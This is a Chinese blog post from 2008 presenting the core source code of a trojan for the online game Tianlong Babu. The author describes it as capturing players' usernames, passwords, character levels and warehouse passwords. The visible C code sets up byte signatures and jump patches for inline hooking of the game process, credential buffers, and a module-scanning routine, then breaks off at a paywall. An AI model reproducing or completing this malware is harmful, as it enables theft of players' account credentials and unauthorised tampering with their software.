天龙八部木马核心代码，版本0.50.0385

iiprogram

于 2008-10-15 10:39:00 发布

阅读量1.2k

点赞数

分类专栏： vcbcbdelphi的window编程文章标签： byte null basic winapi thread ui

本文链接：https://blog.youkuaiyun.com/iiprogram/article/details/3078613

版权

本文分享了一段网游《天龙八部》的木马核心代码，该代码用于截取用户的用户名、密码、等级和仓库密码。代码涉及到基本的字节操作、空值处理、WinAPI调用以及线程和UI交互。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

一个网游木马核心代码...无聊的时候写的..
截取了用户名，密码，等级，仓库密码

Quote:

#include <windows.h>
BYTE userCode[7]={0x8B,0x45,0x0C,0x50,0x8D,0x4B,0x5C};
BYTE userJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};

BYTE gradeCode[6]={0x89,0x9F,0xFC,0x00,0x00,0x00};
BYTE gradeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};

BYTE storeCode[9]={0x8B,0x4E,0x04,0x33,0xC5,0x57,0x8B,0x7D,0x08};
BYTE oldStoreCode[6]={0};
BYTE storeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};

DWORD ui_cegui;

void *lpUserRet=NULL;
void *lpGradeRet=NULL;
void *lpStoreRet=NULL;

char user[40];
char pass[40];
char storePassWord[40];
DWORD dwGrade;

DWORD stroePath=0;
void _stdcall StroeUnhook();

void _stdcall HookStroe();
DWORD CmpFlag(BYTE *flag,char *moduleName,int len,void **lpRet , DWORD *lpModule)
{
BYTE *buff=NULL;

HMODULE hModule=::GetModuleHandle(moduleName);
if(hModule==NULL)
{
::MessageBox(NULL,"获取模块错误","failed",0);
return 0;
}

DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)h

最低0.47元/天解锁文章